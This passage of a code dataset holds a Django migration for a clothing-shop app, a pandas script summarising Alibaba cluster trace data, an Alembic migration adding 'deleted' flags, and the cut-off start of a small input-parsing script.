primary_key=True)),\n ('name', models.CharField(max_length=20)),\n ('url', models.URLField(null=True, blank=True)),\n ('parent', models.OneToOneField(null=True, blank=True, to='magazine.Category')),\n ],\n ),\n migrations.CreateModel(\n name='Color',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('name', models.CharField(max_length=20)),\n ('color', models.CharField(max_length=7)),\n ],\n ),\n migrations.CreateModel(\n name='Comments',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('comment', models.TextField()),\n ('date_and_time', models.DateTimeField(auto_now=True)),\n ],\n ),\n migrations.CreateModel(\n name='Designer',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('name', models.CharField(unique=True, max_length=30)),\n ('personal_information', models.TextField(null=True, blank=True)),\n ],\n ),\n migrations.CreateModel(\n name='Existence',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('amount', models.IntegerField()),\n ('color', models.ForeignKey(to='magazine.Color')),\n ],\n ),\n migrations.CreateModel(\n name='Good',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('name', models.CharField(max_length=17)),\n ('price', models.FloatField(validators=[django.core.validators.MinValueValidator(0)])),\n ('description_full', models.TextField()),\n ('additional_information', models.TextField(null=True, blank=True)),\n ('helpfull_links', models.TextField(null=True, blank=True)),\n ('make_a_gift', models.TextField(null=True, blank=True)),\n ('adding_date', models.DateField()),\n ('visitors_amount', models.IntegerField(default=0, blank=True)),\n ('description_meta', models.TextField(null=True, blank=True)),\n ('keywords_meta', models.TextField(null=True, blank=True)),\n ('image_main', models.ImageField(null=True, upload_to=magazine.models.img_path, blank=True)),\n ('image_1_large', models.ImageField(null=True, upload_to=magazine.models.img_path, blank=True)),\n ('image_2_large', models.ImageField(null=True, upload_to=magazine.models.img_path, blank=True)),\n ('image_3_large', models.ImageField(null=True, upload_to=magazine.models.img_path, blank=True)),\n ('image_4_large', models.ImageField(null=True, upload_to=magazine.models.img_path, blank=True)),\n ('image_1_small', models.ImageField(null=True, upload_to=magazine.models.img_path, blank=True)),\n ('image_2_small', models.ImageField(null=True, upload_to=magazine.models.img_path, blank=True)),\n ('image_3_small', models.ImageField(null=True, upload_to=magazine.models.img_path, blank=True)),\n ('image_4_small', models.ImageField(null=True, upload_to=magazine.models.img_path, blank=True)),\n ('brand', models.ForeignKey(to='magazine.Brand')),\n ('category', models.ForeignKey(to='magazine.Category')),\n ('color', models.ManyToManyField(to='magazine.Color', through='magazine.Existence')),\n ('designer', models.ForeignKey(blank=True, to='magazine.Designer', null=True)),\n ],\n ),\n migrations.CreateModel(\n name='Rating',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('mark', models.IntegerField(validators=[django.core.validators.MinValueValidator(1), django.core.validators.MaxValueValidator(5)])),\n ('good', 
models.ForeignKey(to='magazine.Good')),\n ],\n ),\n migrations.CreateModel(\n name='Sale',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('nominal', models.FloatField(validators=[django.core.validators.MinValueValidator(0), django.core.validators.MaxValueValidator(1)])),\n ('begin', models.DateTimeField(null=True, blank=True)),\n ('end', models.DateTimeField(null=True, blank=True)),\n ],\n ),\n migrations.CreateModel(\n name='Sales',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('dateTime', models.DateTimeField()),\n ('user', models.CharField(max_length=30)),\n ('good_color_size', models.ForeignKey(to='magazine.Existence', null=True)),\n ],\n ),\n migrations.CreateModel(\n name='Size',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('name', models.CharField(max_length=3)),\n ],\n ),\n migrations.AddField(\n model_name='good',\n name='sale',\n field=models.ForeignKey(blank=True, to='magazine.Sale', null=True),\n ),\n migrations.AddField(\n model_name='existence',\n name='good',\n field=models.ForeignKey(to='magazine.Good'),\n ),\n migrations.AddField(\n model_name='existence',\n name='size',\n field=models.ForeignKey(to='magazine.Size'),\n ),\n migrations.AddField(\n model_name='comments',\n name='good',\n field=models.ForeignKey(to='magazine.Good'),\n ),\n migrations.AddField(\n model_name='comments',\n name='parent',\n field=models.ForeignKey(blank=True, to='magazine.Comments', null=True),\n ),\n ]\n","sub_path":"magazine/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":7279,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"117967746","text":"# -*- coding: utf-8 -*-\n# !usr/bin/python3\n\"\"\"\n Ali Trace Machine Statistics\n ~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n copyright:(c) 2017 by Jingwen Shi\n\"\"\"\n\nimport os\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\n\nclass TraceStatistics(object):\n\n def __init__(self):\n # Add data path\n path_server_event = os.path.join(\"./data/server_event.csv\")\n path_container_event = os.path.join(\"./data/container_event.csv\")\n path_batch_instance = os.path.join(\"./data/batch_instance.csv\")\n\n path_batch_task = os.path.join(\"./data/batch_task.csv\")\n path_container_usage = os.path.join(\"./data/container_usage.csv\")\n path_server_usage = os.path.join(\"./data/server_usage.csv\")\n \"\"\"\n # Load distribution map\n col_batch = ['time_istart', 'time_iend', 'jid', 'tid', 'mid', 'status''num_sqe',\n 'num_sqe_total', 'num_cpu_maxus', 'num_cpu_aveus', 'norm_mem_maxu', 'norm_mem_aveus']\n col_container = ['timestampc', 'etypec', 'insid', 'mid',\n 'num_cpu_req', 'norm_mem_req', 'norm_disk_req', 'id_cpu_allo']\n col_server = ['timestamps', 'mid', 'etypes',\n 'edetail','num_cpu', 'norm_mem', 'norm_disk']\n self.batch_instance = pd.DataFrame(pd.read_csv(path_batch_instance,\n names=col_batch, index_col=False))# 16094655 rows\n self.container_event = pd.DataFrame(pd.read_csv(path_container_event,\n names=col_container, index_col=False))# 11102 rows\n self.server_event = pd.DataFrame(pd.read_csv(path_server_event,\n names=col_server, index_col=False))# 1352 rows\n \"\"\"\n # Load usage data\n col_btask = ['time_tcreate', 'time_tend', 'jid', 'tid',\n 'num_ins', 'status', 'num_cpu_req', 'norm_mem_req']\n col_cusage = 
 # server_event is small (1352 rows) and is required by conf_type() below\n col_server = ['timestamps', 'mid', 'etypes',\n 'edetail', 'num_cpu', 'norm_mem', 'norm_disk']\n self.server_event = pd.DataFrame(pd.read_csv(path_server_event,\n names=col_server, index_col=False))\n\n # Load usage data\n col_btask = ['time_tcreate', 'time_tend', 'jid', 'tid',\n 'num_ins', 'status', 'num_cpu_req', 'norm_mem_req']\n col_cusage = ['time_start', 'insid_online', 'per_cpu_req',\n 'per_mem_req', 'per_disk_req', 'ave1_cpu', 'ave5_cpu',\n 'ave15_cpu', 'ave_cpi', 'ave1000_mem_miss', 'max_cpi', 'max_mem_miss']\n col_susage = ['timestampsu', 'mid', 'per_cpu', 'per_mem',\n 'per_disk', 'ave1_cpu', 'ave5_cpu', 'ave15_cpu']\n #self.batch_task = pd.DataFrame(pd.read_csv(path_batch_task,\n # names=col_btask, index_col=False))\n self.container_usage = pd.DataFrame(pd.read_csv(path_container_usage,\n names=col_cusage, index_col=False))\n self.server_usage = pd.DataFrame(pd.read_csv(path_server_usage,\n names=col_susage, index_col=False))\n\n def usage_hour(self):\n # Usage min/max/median of server per timestamp\n copy_serv = self.server_usage\n grouped_scpu_usage = copy_serv['per_cpu'].groupby([copy_serv['timestampsu']])\n count_scpu_usage = grouped_scpu_usage.agg(['min', 'max', 'median'])\n count_scpu_usage.to_csv('./scpu_usage')\n grouped_smem_usage = copy_serv['per_mem'].groupby([copy_serv['timestampsu']])\n count_smem_usage = grouped_smem_usage.agg(['min', 'max', 'median'])\n count_smem_usage.to_csv('./smem_usage')\n grouped_sdisk_usage = copy_serv['per_disk'].groupby([copy_serv['timestampsu']])\n count_sdisk_usage = grouped_sdisk_usage.agg(['min', 'max', 'median'])\n count_sdisk_usage.to_csv('./sdisk_usage')\n\n # Usage min/max/median of container per timestamp\n copy_con = self.container_usage\n grouped_ccpu_usage = copy_con['per_cpu_req'].groupby([copy_con['time_start']])\n count_ccpu_usage = grouped_ccpu_usage.agg(['min', 'max', 'median'])\n count_ccpu_usage.to_csv('./ccpu_usage')\n grouped_cmem_usage = copy_con['per_mem_req'].groupby([copy_con['time_start']])\n count_cmem_usage = grouped_cmem_usage.agg(['min', 'max', 'median'])\n count_cmem_usage.to_csv('./cmem_usage')\n grouped_cdisk_usage = copy_con['per_disk_req'].groupby([copy_con['time_start']])\n count_cdisk_usage = grouped_cdisk_usage.agg(['min', 'max', 'median'])\n count_cdisk_usage.to_csv('./cdisk_usage')\n\n def draw_usage(self):\n # Load data of server usage (skiprows=1 skips the header row written by to_csv)\n col_serv = ['timestampsu', 'min', 'max', 'median']\n scpu_usage = pd.DataFrame(pd.read_csv('./scpu_usage', names=col_serv, index_col=False, skiprows=1))\n smem_usage = pd.DataFrame(pd.read_csv('./smem_usage', names=col_serv, index_col=False, skiprows=1))\n sdisk_usage = pd.DataFrame(pd.read_csv('./sdisk_usage', names=col_serv, index_col=False, skiprows=1))\n # Draw plots of server usage\n fig1 = plt.figure(1)\n plt.subplot(131)\n plt.plot(scpu_usage['timestampsu'].values, scpu_usage['min'].values)\n \"\"\"\n ax11 = fig1.add_subplot(1, 3, 1)\n ax11.plot(scpu_usage['timestampsu'], scpu_usage['min'])\n ax12 = fig1.add_subplot(1, 3, 2)\n ax12.plot(smem_usage['timestampsu'], smem_usage['max'])\n ax13 = fig1.add_subplot(1, 3, 3)\n ax13.plot(sdisk_usage['timestampsu'], sdisk_usage['median'])\n\n # Load data of container usage\n col_con = ['time_start', 'min', 'max', 'median']\n ccpu_usage = pd.DataFrame(pd.read_csv('./ccpu_usage', names=col_con, index_col=False, skiprows=1))\n cmem_usage = pd.DataFrame(pd.read_csv('./cmem_usage', names=col_con, index_col=False, skiprows=1))\n cdisk_usage = pd.DataFrame(pd.read_csv('./cdisk_usage', names=col_con, index_col=False, skiprows=1))\n\n # Draw plots of container usage\n fig2 = plt.figure(2)\n ax21 = fig2.add_subplot(1, 3, 1)\n ax21.plot(ccpu_usage['time_start'], ccpu_usage['min'])\n ax22 = fig2.add_subplot(1, 3, 2)\n ax22.plot(cmem_usage['time_start'], cmem_usage['max'])\n ax23 = fig2.add_subplot(1, 3, 3)\n ax23.plot(cdisk_usage['time_start'], cdisk_usage['median'])\n
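 # Sketch: the panels would be easier to read with titles, axis labels and\n # an on-disk copy; all standard matplotlib calls, e.g.:\n # ax11.set_title('server CPU min'); ax11.set_xlabel('timestamp')\n # fig1.savefig('./server_usage.png')\n # fig2.savefig('./container_usage.png')\n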
\"\"\"\n plt.show()\n\n def conf_type(self):\n \"\"\"\n Count machine configurations using groupby()\n Cpu = 0 memory = 0 disk = 0 are not counted\n \"\"\"\n copy = self.server_event\n copy['one'] = 1\n conf = copy[self.server_event.num_cpu > 0]\n grouped_conf = conf['one'].groupby([conf['num_cpu'], conf['norm_mem'],\n conf['norm_disk']])\n conf_type = grouped_conf.count()\n conf_type.to_csv('./conf_type.csv', sep='|')\n # List mid of different configuration and check if there're duplicated machines\n grouped_conf0 = conf['one'].groupby([conf['num_cpu'], conf['norm_mem'],\n conf['norm_disk'], conf['mid']])\n conf_type0 = grouped_conf0.count()\n conf_type0.to_csv('./conf_type0.csv', sep='|')\n # Output results\n print(\"Total Number of machine:\")\n print(len(set(self.server_event['mid'])))\n print(\"Configuration types:\")\n print(conf_type)\n\n def job_duration(self):\n # Run time of task\n time_tcreate = pd.DataFrame(self.batch_task['time_tcreate'],\n self.batch_task['jid']).groupby('jid')\n min_tcreate = time_tcreate.min()\n time_tend = pd.DataFrame(self.batch_task['time_tend'],\n self.batch_task['jid']).groupby('jid')\n max_tend = time_tend.max()\n create_stop = pd.merge(min_tcreate, max_tend, on='jid')\n duration = [create_stop['jid'], create_stop['time_tend']-create_stop['time_tcreate']]\n print(duration)\n\n def task_requested_resource(self):\n # Raw Required resources (CPU and Memory) of task\n max_cpu = self.batch_task['num_cpu_req'].max()\n norm_cm_req = np.array(self.batch_task['jid'], self.batch_task['num_cpu_req']/max_cpu,\n self.batch_task['norm_mem_req'])\n print(norm_cm_req)\n\nmstatistic = TraceStatistics()\nmstatistic.conf_type()\n#mstatistic.usage_hour()\n#mstatistic.draw_usage()\n","sub_path":"Trace.py","file_name":"Trace.py","file_ext":"py","file_size_in_byte":8107,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"130401408","text":"\"\"\"empty message\n\nRevision ID: 9f135f2eb76f\nRevises: 080f7a4f55d3\nCreate Date: 2019-09-17 21:31:17.724610\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '9f135f2eb76f'\ndown_revision = '080f7a4f55d3'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('colonies', sa.Column('deleted', sa.Boolean(), server_default='FALSE', nullable=True))\n op.add_column('colonies_processed_materials', sa.Column('deleted', sa.Boolean(), server_default='FALSE', nullable=True))\n op.add_column('colonies_raw_resources', sa.Column('deleted', sa.Boolean(), server_default='FALSE', nullable=True))\n op.add_column('colonies_refined_commodities', sa.Column('deleted', sa.Boolean(), server_default='FALSE', nullable=True))\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! 
###\n op.drop_column('colonies_refined_commodities', 'deleted')\n op.drop_column('colonies_raw_resources', 'deleted')\n op.drop_column('colonies_processed_materials', 'deleted')\n op.drop_column('colonies', 'deleted')\n # ### end Alembic commands ###\n","sub_path":"migrations/versions/2019-09-17, 21:31.py","file_name":"2019-09-17, 21:31.py","file_ext":"py","file_size_in_byte":1231,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"379258965","text":"strin = input()\nk = int(strin[0])\nn = int(strin[3:len(strin)])\ntotal = []\na = [0]*10\nresult = []\ndef func(n,r,m):\n if n